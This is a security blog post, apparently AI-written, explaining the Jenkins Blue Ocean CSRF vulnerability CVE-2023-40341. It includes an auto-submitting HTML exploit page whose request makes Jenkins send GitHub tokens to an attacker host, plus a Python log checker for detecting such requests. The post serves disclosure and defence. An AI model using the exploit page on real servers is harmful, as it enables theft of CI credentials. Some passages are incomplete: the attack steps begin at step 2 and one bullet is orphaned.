In late 2023, a serious security flaw was found in the popular Blue Ocean plugin for Jenkins. Tracked as CVE-2023-40341, this vulnerability lets an external attacker make a logged-in user's browser send requests to Jenkins that the user never intended (cross-site request forgery, CSRF). Worse, it can be used to steal the GitHub credentials configured for a Jenkins job. This post breaks down how the exploit works, shows code snippets, and offers references for further reading, all in plain English.

What is Jenkins Blue Ocean?

Jenkins is one of the world's most widely used automation servers, typically for continuous integration and delivery (CI/CD). Blue Ocean is a popular Jenkins plugin that provides a modern, cleaner interface for pipelines.

- An attacker can capture the GitHub credentials tied to a Jenkins job of their choosing.

In short: if your Jenkins runs Blue Ocean 1.27.5 or earlier, an attacker can quietly trick it into handing over the GitHub tokens connected to your pipelines.

References

- Jenkins Security Advisory
- NVD CVE Entry

CSRF Basics

CSRF lets an attacker force a logged-in user's browser to submit unwanted requests to a web app. If you are already logged into Jenkins, an attacker can ride on your browser session to send requests you never approved.

In Blue Ocean

The Blue Ocean plugin uses REST endpoints to connect to resources like GitHub repos. Normally, these should be protected with CSRF tokens (crumbs in Jenkins), but version 1.27.5 and earlier left some endpoints unprotected.

SSRF Scenario

The attacker creates a web page (a malicious site) that makes your browser, which is logged into Jenkins, send a Blue Ocean REST call naming a GitHub API URL the attacker controls. Jenkins, trusting the request because it arrives with your session, sends your GitHub credentials/tokens to that URL, and the attacker collects them on their server.

2. The attacker tricks the victim (via email or a malicious site) into visiting a crafted web page.
3. The page auto-submits a form or uses JavaScript to hit Blue Ocean's "connect" endpoint, specifying a malicious URL controlled by the attacker.
4. Jenkins uses the victim's credentials to contact the attacker's URL, sending the GitHub tokens in the process.

Let's look at a simple example using a basic HTML page. This is what the attacker might host:

```html
<!-- exploit.html -->
<html>
  <body>
    <!-- Hidden form auto-submits a POST to the vulnerable endpoint -->
    <form action="https://your-jenkins.com/blue/rest/organizations/jenkins/pipelines/vuln-job/credential-store/github/connect" method="POST" id="exploitForm">
      <input type="hidden" name="apiUrl" value="https://evil-collect-server.com/github-api">
    </form>
    <script>
      document.getElementById('exploitForm').submit();
    </script>
  </body>
</html>
```

What happens:

- The form auto-submits, and the browser attaches the victim's Jenkins session cookies to the request.

- Jenkins’ Blue Ocean plugin connects to https://evil-collect-server.com/github-api using the victim’s GitHub credentials.
- The attacker's server logs the incoming request and extracts the credential/token.

Detecting and Protecting

Check if you’re vulnerable:

- Is Jenkins running Blue Ocean 1.27.5 or below?

- Are users connecting GitHub accounts to pipelines/jobs?
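Beyond the version check, you can look for exploitation attempts in the access log of the reverse proxy in front of Jenkins. The following Python checker is an added example, not code from the original post or from the Jenkins project: it applies the apiUrl validation the fixed endpoint needs (https only, known GitHub API hosts only) and scans log lines for POSTs to the connect endpoint whose Origin/Referer is not your Jenkins host, which is exactly what the auto-submitting form above produces. The nginx log format, the Jenkins hostname, the allowed host list, and the endpoint path taken from the proof of concept are all assumptions; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit
JENKINS_HOST = "your-jenkins.com"       # placeholder host from the page's example
ALLOWED_API_HOSTS = {"api.github.com"}  # assumption: add your GitHub Enterprise API host

# Path of the Blue Ocean "connect" endpoint exactly as written in the proof of concept above.
CONNECT_RE = re.compile(
    r"^/blue/rest/organizations/[^/]+/pipelines/[^/]+/credential-store/github/connect/?$")
# Assumed nginx log_format on the reverse proxy in front of Jenkins:
#   '$remote_addr - $remote_user [$time_local] "$request" $status $body_bytes_sent "$http_referer" "$http_origin"'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \d+ "(?P<referer>[^"]*)" "(?P<origin>[^"]*)"$')

# Constructed sample lines (not real traffic): legitimate connect, cross-site connect, unrelated GET, connect with no Origin/Referer.
SAMPLE_LOG = [
    '10.0.0.5 - alice [16/Aug/2023:15:20:01 +0000] "POST /blue/rest/organizations/jenkins/pipelines/vuln-job/credential-store/github/connect HTTP/1.1" 200 312 "https://your-jenkins.com/blue/" "https://your-jenkins.com"',
    '10.0.0.5 - alice [16/Aug/2023:15:21:44 +0000] "POST /blue/rest/organizations/jenkins/pipelines/vuln-job/credential-store/github/connect HTTP/1.1" 200 312 "https://evil-site.example/exploit.html" "https://evil-site.example"',
    '10.0.0.7 - bob [16/Aug/2023:15:22:10 +0000] "GET /blue/pipelines/ HTTP/1.1" 200 8831 "-" "-"',
    '10.0.0.9 - - [16/Aug/2023:15:23:02 +0000] "POST /blue/rest/organizations/jenkins/pipelines/vuln-job/credential-store/github/connect HTTP/1.1" 200 312 "-" "-"',
]

def api_url_is_allowed(api_url, allowed_hosts=ALLOWED_API_HOSTS):
    """Server-side check the fixed endpoint needs: https only, and only a known GitHub API host."""
    parts = urlsplit(api_url)
    return parts.scheme == "https" and (parts.hostname or "") in allowed_hosts

def cross_site_reason(entry, jenkins_host=JENKINS_HOST):
    """Why a parsed log entry looks like a CSRF hit on the connect endpoint, or None if it does not."""
    if entry["method"] != "POST" or not CONNECT_RE.match(entry["path"]):
        return None
    # Browsers send Origin on cross-site form POSTs; fall back to Referer when Origin is absent.
    source = entry["origin"] if entry["origin"] != "-" else entry["referer"]
    if source == "-":
        return "POST to connect endpoint with no Origin/Referer (non-browser client or stripped header)"
    host = urlsplit(source).hostname or ""
    return None if host == jenkins_host else f"cross-site POST to connect endpoint from {host}"

def find_suspicious(lines, jenkins_host=JENKINS_HOST):
    # Returns (ip, timestamp, reason) for every line that matches the CSRF pattern.
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # unexpected format: skip rather than guess
        reason = cross_site_reason(m.groupdict(), jenkins_host)
        if reason:
            hits.append((m["ip"], m["ts"], reason))
    return hits
```

A hit with a foreign Origin is the strongest signal; a POST with no Origin or Referer at all may be a legitimate API client using a token, so treat it as lower confidence and confirm against the Jenkins audit trail.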

Mitigation:

- Educate users not to visit unknown sites while logged into Jenkins.

Official Fix:
According to Jenkins Security Advisory 2023-08-16, Blue Ocean was updated to prevent CSRF on affected endpoints. All users should upgrade immediately.

Original References

- Jenkins Security: 2023-08-16 Advisory
- NVD Entry: CVE-2023-40341
- Blue Ocean Plugin: Jenkins Plugins

Summary

CVE-2023-40341 is a dangerous real-world Jenkins flaw that makes GitHub tokens sitting ducks for bad actors. If you care about your code and infrastructure, update Blue Ocean NOW. Remember, CSRF isn't just jargon: it can lead to credential theft and serious supply chain attacks.

Security is a journey, not a destination. Stay safe!

---
*Written exclusively for this request by an AI security researcher.*

Timeline

Published on: 08/16/2023 15:15:00 UTC
Last modified on: 08/18/2023 20:04:00 UTC